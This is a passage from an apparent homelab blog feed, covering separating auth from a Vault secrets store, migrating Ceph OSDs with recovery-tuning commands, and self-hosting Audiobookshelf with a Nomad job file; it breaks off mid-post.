I didn&rsquo;t want to mix the two things, namely user auth and Homelab secrets. Two
reasons for that: First, I might conceivably have additional users someday. That
would make security harder to reason about, by having admin-level access to
the lab and user access to the services running in that lab mixed up in one system.
Second, I want to secure public facing services - so my IdP also needs to be
accessible publicly. And I really don&rsquo;t want my secrets store to hang on the
open internet.</p>
<p>Sure, I could do things like allowing my external proxy to only forward certain
URLs to the Vault cluster. But honestly: I prefer there to be exactly zero paths
from the public Internet to the listening sockets of my secrets store.</p>
<p>One big advantage Vault has over Keycloak though: It supports fine-grained
permissions per user per client, so users can&rsquo;t connect to a client just because
they are members of the same realm as said client.</p>
<p>You might also have realized that in the Apps section, I did not mention a
single infrastructure app, e.g. Vault, Consul or Nomad. This was on purpose,
as I did not want my public Identity Provider to be able to grant access
to admin-level apps. But I am considering setting up Vault OIDC specifically
for apps like Consul, Vault and Nomad. I will just first have to make really
sure that I&rsquo;ve got an escape hatch ready. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating two Ceph OSDs from one physical hosts to another</title>
      <link>https://blog.mei-home.net/posts/ceph-migration-old-homeserver/</link>
      <pubDate>Sun, 23 Apr 2023 21:47:40 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-migration-old-homeserver/</guid>
      <description>Description of the procedure and discussion of the performance.</description>
      <content:encoded><![CDATA[<p>Over the weekend, I migrated one of the Ceph VMs in my Homelab over to a
physical host. This time around, instead of buying a completely new machine,
I recycled most of my old 2018 era home server. It&rsquo;s an old AMD A10-9700E,
meaning the 35W TDP variant.</p>
<p>I have noted some thoughts on reusing this old machine <a href="https://blog.mei-home.net/posts/reuse-old-homelab/">here</a>.</p>
<p>Mounted in the rack, the machine looks like this:</p>
<figure>
    <img loading="lazy" src="server-in-rack.jpg"
         alt="A picture of a 19 inch rack mounted server. It shows a 3U case, with a full size ATX PSU and mATX mainboard. Quite recognizable are beige-and-brown colored case and CPU fans"/> <figcaption>
            <p>Server mounted in the rack, without Ceph OSD disks attached.</p>
        </figcaption>
</figure>

<p>The setup went as always. First generating an Ubuntu based image with Packer.
Again pretty funny: The QEMU builder for Packer takes a bog-standard
install medium. Those install media generally require at least some input
from the user. And Packer just provides a list of strings for the commands it
will then send to the VM&rsquo;s <code>stdin</code> to be entered into any prompts. You can also
sprinkle some <code>wait</code> commands into the list to make sure the right input
field is present before Packer starts &ldquo;typing&rdquo;. :beaming_face_with_smiling_eyes:</p>
<p>That went extremely smoothly this time around. I believe this was the first time
since starting to use Packer and Ansible for deployments where I did not have to
fiddle with the bootstrapping playbook while creating and deploying the new
host. :grinning_face:</p>
<p>Putting it all into the case also went pretty well. This time, I bought the right
length of rails and also configured them right from the beginning. No sticking
out of the rack for this server.
As always when it comes to rails and my Homelab, there was a problem though: I
had done a test fitting before putting in the components, to make sure I got the
rails right. And afterwards, I wasn&rsquo;t able to get the case dismounted again.</p>
<p>I now know two things: I really don&rsquo;t like mounting rails. And I can actually
build an entire machine while the case is already mounted. Although my back
insisted that I don&rsquo;t do that again anytime soon. :grinning_face_with_sweat:</p>
<h2 id="ceph-migration">Ceph migration</h2>
<p>If there&rsquo;s one thing which annoys me every time with Ceph, it is that there&rsquo;s
no good way to take disks out of one host, put them into another, and then
get the disks <em>and their content</em> reused by a fresh OSD.
So every time I switch hosts, I have to remove the OSDs from one host, wait for
re-balancing to finish, put them into the other host, and then wait for more or
less the same data that was on them before to be written to the disks again.</p>
<p>But when searching the web, pretty much everyone runs into problems when they
somehow try to work around this limitation. And if there&rsquo;s one thing I don&rsquo;t
want to look like it came right out of Frankenstein&rsquo;s lab, it&rsquo;s my storage
daemons.</p>
<p>So OSD removal it was. And that took over one day. Even though there was only
a single-digit number of terabytes to transfer. When an OSD is removed from a Ceph
cluster, a recovery operation takes place. This operation takes all
the placement groups on the removed OSDs and migrates them to other OSDs. As I
only have six OSDs in my cluster (three large HDD, three smaller SSD) and a
replication factor of two, I would expect this to go relatively fast. But it
didn&rsquo;t.</p>
<p>And that is the problem I would like to dig into a bit. I started the removal
of the old OSDs with a <code>ceph orch host drain</code> command on Friday at 13:45h. It was
done on Sunday morning at 00:50h.</p>
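<p>For reference, a short sketch of the commands involved (the host name is a
placeholder); the drain itself is a single command, and the rest is just for
watching the progress:</p>
<pre tabindex="0"><code># evacuate all daemons (including OSDs) from the host
ceph orch host drain cephhost1

# watch the OSD removal / draining progress
ceph orch osd rm status

# keep an eye on overall recovery
ceph -s
</code></pre>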
<figure>
    <img loading="lazy" src="removal-pg-graph.png"
         alt="A screenshot of a Grafana time series graph. The Y axis shows values from 0 to 190, while the X axis shows time from 21.04.2023 18:00h to 23.04.2023 00:00. The graph first falls rapidly from it&#39;s starting point at about 170 on the y axis, until about 18:00 on the 21st. Then it falls slower, with a marked flat line between approximately 23:00h on the 21st and 10:00h on the 22nd. It reaches 0 around 01:00 on the 23rd."/> <figcaption>
            <p>The number of Placement groups in the &lsquo;remapped&rsquo; state over time.</p>
        </figcaption>
</figure>

<p>The initial rapid remapping of PGs is when the SSD OSD got cleared. After that,
with the HDD OSD, the remapping rate fell precipitously.</p>
<figure>
    <img loading="lazy" src="disk-io-removal.png"
         alt="Screenshot of a Grafana time series graph. The graph is titled &#39;Disk IO Utilization&#39;. It shows a percentage from 0% to 100% on the Y axis and time from 14:35h on 21.04.2023 to 01:00h on 23.04.2023 on the X axis. The plot labeled &#39;sdb&#39; goes from 70% in the beginning, to 45% at around an hour later all the way down to merely 2.70% starting at 23:00h on the 21st and remains there until the end. The plot labeled &#39;sdc&#39; goes to 100% in the beginning and falls to 18% around 15:18h on the 21st and then stays at that level until the end."/> <figcaption>
            <p>Disk IO utilization on one of the Ceph hosts which received the PGs from the draining host</p>
        </figcaption>
</figure>

<p>The picture above is representative of the situation on all three hosts involved
in the re-balancing. In the beginning, all disks ran near 100%, capped by my 1 Gbps
network. But after a while, the performance fell further and further, until
I saw only a maximum of 10 MB/s on Saturday morning. The other resources looked similar:
network was not bottlenecked, CPU usage was pretty low (and no core was pegged at 100%),
and disk IO was minimal on all three hosts.</p>
<h2 id="swapping-disks">Swapping disks</h2>
<p>This morning, after the migration was finally done, I switched the disks from
the old server to the new one. One problem I had foreseen was how to determine
which disks to pull. The server has six, and I only wanted two of them.</p>
<p>I finally found the solution in looking at <code>/dev</code>, specifically the
<code>/dev/disk/by-path</code> directory. The result looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-2 -&gt; ../../sda
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-2.0 -&gt; ../../sda
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3 -&gt; ../../sdb
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part1 -&gt; ../../sdb1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part2 -&gt; ../../sdb2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part3 -&gt; ../../sdb3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0 -&gt; ../../sdb
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part1 -&gt; ../../sdb1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part2 -&gt; ../../sdb2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part3 -&gt; ../../sdb3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4 -&gt; ../../sdc
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part1 -&gt; ../../sdc1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part2 -&gt; ../../sdc2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part3 -&gt; ../../sdc3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0 -&gt; ../../sdc
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part1 -&gt; ../../sdc1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part2 -&gt; ../../sdc2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part3 -&gt; ../../sdc3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-8 -&gt; ../../sdd
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-8.0 -&gt; ../../sdd
</span></span></code></pre></div><p>The number after the <code>-ata</code> is the SATA port on the mainboard to which the drive
is connected. Or at least it should be. In my case, I got lucky. The numbers
corresponded perfectly to the silk screen on the board, and I was able to
identify the disks I needed to pull this way.</p>
<p>Still, a tip: Unplug the disk you think you want to pull and boot the machine
first, just to make sure it&rsquo;s the right one. I had read the silk screen wrong and
pulled one of the system disks.</p>
<p>After I had installed the drives, I started the same operation as before, just
in reverse: I added the new OSDs to the Ceph cluster with <code>ceph orch daemon add osd HOSTNAME:/dev/sdX</code>.</p>
<p>And again, I was greeted with anemic backfill rates of around 10 MB/s after the
SSD was filled.</p>
<p>I checked the two config values I had used before, <code>osd_recovery_max_active</code> and
<code>osd_max_backfills</code>, but they were still set to <code>40</code>. And yet, I only saw a few
PGs being remapped at a time. It turns out that there&rsquo;s a new(ish) scheduler in
Ceph, <a href="https://docs.ceph.com/en/quincy/rados/configuration/osd-config-ref/#dmclock-qos">mClock</a>.</p>
<p>With this new scheduler, <em>profiles</em> were introduced, which override the
aforementioned settings. And this scheduler has a <code>high_recovery_ops</code> profile.
Switching it on with <code>ceph config set osd osd_mclock_profile high_recovery_ops</code>
increased the throughput&hellip;to a still pretty bad 20 MB/s. Digging further, I
found the <code>osd_mclock_override_recovery_settings</code> option. Switching this one to
<code>true</code> then finally gave me the roughly 60 MB/s I would expect at a minimum, after
setting the <code>osd_max_backfills</code> and <code>osd_recovery_max_active</code> options I mentioned
above again. But even that didn&rsquo;t last too long. While writing these lines, the
recovery rate has fallen back to about 35 MB/s.</p>
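<p>For my own future reference, the sequence of tuning commands described above as
one block; the values are the ones I used, so treat this as a sketch rather than a
recommendation:</p>
<pre tabindex="0"><code># switch the mClock scheduler to the recovery-oriented profile
ceph config set osd osd_mclock_profile high_recovery_ops

# allow the classic backfill/recovery options to override the mClock limits
ceph config set osd osd_mclock_override_recovery_settings true

# then bump the classic recovery knobs again
ceph config set osd osd_max_backfills 40
ceph config set osd osd_recovery_max_active 40
</code></pre>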
<p>And I still don&rsquo;t know why Ceph doesn&rsquo;t use more of the available resources.
Sure, I can understand leaving some resources on standby, just in case more
client requests show up. But this much? In theory, I should be reaching about
120 MB/s, which is the max of both my 1 Gbps LAN and my HDDs.</p>
<p>Instead of writing this blog post, I really should have made it a mailing list
post on the Ceph mailing list. I&rsquo;m reasonably sure that I&rsquo;m doing something
fundamentally wrong here.</p>
<p>If any of you have a good hint, I would be very happy to hear it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Audiobookshelf for Podcasts and Audiobooks</title>
      <link>https://blog.mei-home.net/posts/audiobookshelf/</link>
      <pubDate>Wed, 12 Apr 2023 23:49:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/audiobookshelf/</guid>
      <description>Setting up a self-hosted instance of Audiobookshelf</description>
      <content:encoded><![CDATA[<p>I was recently introduced to the excellent <a href="https://wolf359.fm/">Wolf 359</a> audio
drama. It&rsquo;s the story of the crew of a space station orbiting a distant star,
with good humor and interpersonal drama as well as some suspense/horror sprinkled
in.</p>
<p>I have a small set of other podcasts as well, first and foremost the great
<a href="https://www.thebritishhistorypodcast.com/">British History Podcast</a>. Up to this
point, I had mostly listened on my phone, during train rides, but also via my
browser during Saturday morning household chores.</p>
<p>My problem: I used <a href="https://podcastaddict.com/app">Podcast Addict</a> on my phone,
and the podcast&rsquo;s website on my PC. So there was no syncing of which episodes
I had already listened to, and no syncing of listen positions inside an episode.</p>
<p>So that was my main motivator to look into a selfhosted podcast app. In addition,
I have a couple of audiobooks from the pandemic lockdown times I listened to
while making and eating lunch, which I also wanted to put somewhere that wasn&rsquo;t
Audible.</p>
<h2 id="the-possible-solutions">The possible solutions</h2>
<p>There are a number of solutions for selfhosted podcast apps. I had the following
requirements in my mind:</p>
<ul>
<li>Needed to sync at least completed episodes</li>
<li>Needed a web player, because I&rsquo;m just used to doing many things in the browser
these days</li>
<li>Bonus: Sync listening position in a started episode</li>
</ul>
<p>On my &ldquo;services to look at&rdquo; list, I already had
<a href="https://github.com/akhilrex/podgrab">Podgrab</a>. But looking at the Github repo,
the last commit was from September 2022 - a bit too long ago for my taste. But
looking at the open issues, I saw <a href="https://github.com/akhilrex/podgrab/issues/272">this one</a>
advertising <a href="https://github.com/SamTV12345/PodFetch">an alternative</a>.</p>
<blockquote>
<p>It is written in Rust</p></blockquote>
<p>Well excellent. That universal moniker for quality software.
(I&rsquo;m sorry Rustaceans. I know you really like your language. And I promise I
will most likely come around to your language. Once the community has gotten
past its proselytizing phase.)</p>
<p>But Rust wasn&rsquo;t the main problem with it, of course. Instead it was the fact
that when I launched the container locally, it just didn&rsquo;t work. No player showed up.
That might have been due to the fact that it is using websockets, and the
protocol upgrade simply didn&rsquo;t work properly. But it turned me off. So did the
rather barebones Web UI. Granted, when you&rsquo;re looking at the Web UI for a
podcast player, you&rsquo;re doing it wrong. But it still turned me off.</p>
<p>Then, I read about <a href="https://gpodder.github.io/">GPodder</a>. It&rsquo;s a Linux desktop
podcast manager, but also a protocol for podcast progress sync.
I wasn&rsquo;t too hot on the &ldquo;Linux Desktop App&rdquo; idea, to be honest. And the docs for
the <a href="https://github.com/gpodder/mygpo">selfhosted variant</a> of <a href="https://gpodder.net/">the gpodder
online service</a> didn&rsquo;t look too confidence-inspiring.</p>
<p>Finally, I decided on <a href="https://www.audiobookshelf.org/">Audiobookshelf</a>. At
first look, it fulfilled all my requirements and actually worked when I ran it
locally.</p>
<h2 id="the-winner-audiobookshelf">The winner: Audiobookshelf</h2>
<p>Audiobookshelf started its life as a pure audiobook app and only added podcasts
a little while ago. But having a combo app suited me quite well, as I also have
some audiobooks on Audible I always wanted to get onto my own infrastructure.</p>
<p>It works on the principle of &ldquo;libraries&rdquo;, and is entirely file based where the
media itself is concerned. If you remove a file for a podcast episode or an
audiobook, it will also be removed from your Audiobookshelf library, as ABS
doesn&rsquo;t track library items on its own.</p>
<p>When you open it, you are greeted with a nice interface for both podcasts
and audiobooks.</p>
<figure>
    <img loading="lazy" src="audiobookshelf_home.png"
         alt="A screenshot of the audiobookshelf web UI. On the left is a menu, showing the following entries: Home, Library, Series, Collections, Authors. In the header is a search bar on the left. On the right are three symbols, a stylized bar char, an upload button and a cogwheel. The main area has several sections, each showing the covers of audiobooks, with their titles and authors beneath them. The sections are: Recently Added, Recent Series and cut off at the bottom the Recommended section."/> 
</figure>

<p>As you can see, I tend towards historical novels. &#x1f609; I can recommend all of them,
especially Rebecca Gable&rsquo;s Waringham Saga if you&rsquo;re into medieval England.</p>
<p>The podcasts page looks very similar:</p>
<figure>
    <img loading="lazy" src="audiobookshelf_podcasts.png"
         alt="Another screenshot of the Web UI. This time, the menu on the left of the screen contains these entries: Home, Latest, Library, Search, Queue. The sections in the main area are: Continue Listening, Newest Episodes, Recently Added."/> 
</figure>

<p>In the search tab, you can either search by keyword (which uses iTunes for the
search) or you can enter an RSS feed URL directly. When something is found,
ABS will show the available info on the Podcast.</p>
<figure>
    <img loading="lazy" src="audiobookshelf_search.png"
         alt="Another screenshot of the Web UI. The details available are the podcasts title and author, the feed URL, Genres, a drop-down for the Type, a field for Language and description, a checkbox to mark the content as explicit, the folder for the podcasts files. Finally, a checkbox to automatically download podcast episodes."/> 
</figure>

<p>Once a new podcast is added, its page will look pretty blank.</p>
<figure>
    <img loading="lazy" src="podcast_empty.png"
         alt="Another screenshot of the Web UI. The page shows the podcasts cover picture, title, genre etc at the top. At the bottom is a section headed Episodes, which helpfully shows No Episodes in the screenshot."/> 
</figure>

<p>As mentioned before, Audiobookshelf is entirely file based. And because we
haven&rsquo;t downloaded an episode yet, ABS shows that there are no episodes. Which
is my biggest complaint at the moment. Because everything is tied to files on
disk, I can only see episodes which I downloaded. I can of course fix this by
enabling automatic download of new episodes. But this will mean that my disk
will fill up pretty quickly with my current 28 podcasts. I would very
much prefer a setup like Podcast Addict, where it shows me all the available
episodes, and I can click to download a couple of them.</p>
<p>This behavior also has repercussions for finished episodes. Yes, I can then
delete them. But if I haven&rsquo;t downloaded a number of fresh episodes already,
I have no way of knowing where I was, as ABS does not store the finished state
after an episode file is deleted. So for now, I have to pay attention and
make sure I always download a fresh episode before I delete the last finished
episode.</p>
<p>In principle, this isn&rsquo;t too bad for audio dramas, where I might actually want
to keep episodes for repeat listening. But for something like the weekly Self-Hosted
podcast or Linux After Dark, I don&rsquo;t care too much about old episodes I have
already finished.</p>
<p>But let&rsquo;s continue the UI tour. To download new episodes, you click the
magnifying glass, where you will then be shown a list of the available episodes
from the RSS feed.</p>
<figure>
    <img loading="lazy" src="podcast_episode_search.png"
         alt="Another screenshot of the Web UI. It shows a list of available episodes, with their episode number, title, publishing date and first line of description. There is also a search bar at the top."/> 
</figure>

<p>If you actually have some episodes downloaded, they will be clearly marked in
the list.</p>
<figure>
    <img loading="lazy" src="podcast_list_downloaded.png"
         alt="The bottom of the same list as before, but now there is a green check mark next to the very first episode."/> 
</figure>

<p>As a pretty nice feature, you can re-export any podcast as an RSS feed, so that
you can point e.g. your phone&rsquo;s podcast app at it. That way you lose listening-position
and finished-episode sync, of course.</p>
<p>As a connoisseur of pretty plots, I also need to mention that there are a couple
of stats available on your listening habits.</p>
<figure>
    <img loading="lazy" src="stats.png"
         alt="The stats page shows a line chart with listening time, minutes on the Y axis and date on the X axis. Furthermore, completed items, days listening etc are also shown."/> 
</figure>

<p>In my defense of the 555 minutes on Wednesday: I took a sick day because I
had overextended something in my neck and could barely hold up my head for any
length of time. So I found a comfortable position on the couch, donned headphones
and started listening. &#x1f605;</p>
<p>I&rsquo;ve also used it during my commute today. It works nicely as a Progressive
Web App (PWA) added to my home screen, including player controls on the lock
screen.
The only thing missing is preloading episodes: the web player streams them
directly from the server, which is probably not too good for my monthly data volume.
Here, re-exporting the RSS feed would work, but then I wouldn&rsquo;t have playback
position and finished-episode sync. &#x1f937;</p>
<p>In summary, I&rsquo;m pretty satisfied with the app, apart from that one problem
of it being entirely file based. But this is of course a legacy of its audiobook
roots, and there are several open issues on GitHub to address it.</p>
<h2 id="setup">Setup</h2>
<p>And now finally to the setup. As always, I have set ABS up as a Nomad job,
using a Ceph CSI RBD volume for storage, Consul connect service mesh for
connectivity and Traefik as my proxy.</p>
<p>As ABS does not have any external dependencies, the setup was pretty
straightforward. It also does not have many configuration options.</p>
<p>One very important thing to note: In all of the Docker examples, there are
specific directories mounted for the audiobook and podcast libraries. Don&rsquo;t
get fooled by this. I did. I spent a considerable amount of time puzzling over
the fact that it has config options to define the metadata and config dirs, but
not the audiobook and podcast library dirs, and tried to wrap my head around
how to use a single Ceph CSI volume to supply two different top-level directories
in the container.</p>
<p>Of course, in hindsight, that was pretty stupid. Because the reason ABS doesn&rsquo;t
have config options for the audiobook and podcast libraries is&hellip;that you
can freely choose the directory for your libraries when you create them. &#x1f926;</p>
<p>Here&rsquo;s my Nomad job file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mine&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {}
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.audiobookshelf.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">internal</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">entry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.audiobookshelf.rule<span style="color:#f92672">=</span><span style="color:#66d9ef">Host</span>(<span style="color:#960050;background-color:#1e0010">`</span><span style="color:#66d9ef">audio</span>.<span style="color:#66d9ef">example</span>.<span style="color:#66d9ef">com</span><span style="color:#960050;background-color:#1e0010">`</span>)<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">check</span> {
</span></span><span style="display:flex;"><span>        type     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;http&#34;</span>
</span></span><span style="display:flex;"><span>        interval <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;30s&#34;</span>
</span></span><span style="display:flex;"><span>        path     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/healthcheck&#34;</span>
</span></span><span style="display:flex;"><span>        timeout  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3s&#34;</span>
</span></span><span style="display:flex;"><span>        port     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;health&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">volume</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>      type            <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;csi&#34;</span>
</span></span><span style="display:flex;"><span>      source          <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>      attachment_mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;file-system&#34;</span>
</span></span><span style="display:flex;"><span>      access_mode     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;single-node-writer&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">task</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>      driver <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;docker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">config</span> {
</span></span><span style="display:flex;"><span>        image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ghcr.io/advplyr/audiobookshelf:2.2.18&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">volume_mount</span> {
</span></span><span style="display:flex;"><span>        volume      <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vol-audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>        destination <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">env</span> {
</span></span><span style="display:flex;"><span>        CONFIG_PATH <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data/config&#34;</span>
</span></span><span style="display:flex;"><span>        METADATA_PATH <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/hn-data/metadata&#34;</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">resources</span> {
</span></span><span style="display:flex;"><span>        cpu <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory <span style="color:#f92672">=</span> <span style="color:#ae81ff">400</span>
</span></span><span style="display:flex;"><span>        memory_max <span style="color:#f92672">=</span> <span style="color:#ae81ff">4096</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing particularly notable in most of the config.
The container listens on port <code>80</code> by default.
I&rsquo;m mounting the RBD volume under <code>/hn-data</code> and setting the <code>metadata</code> and <code>config</code>
paths under that mount.</p>
<p>The volume was created via Nomad with this file:</p>
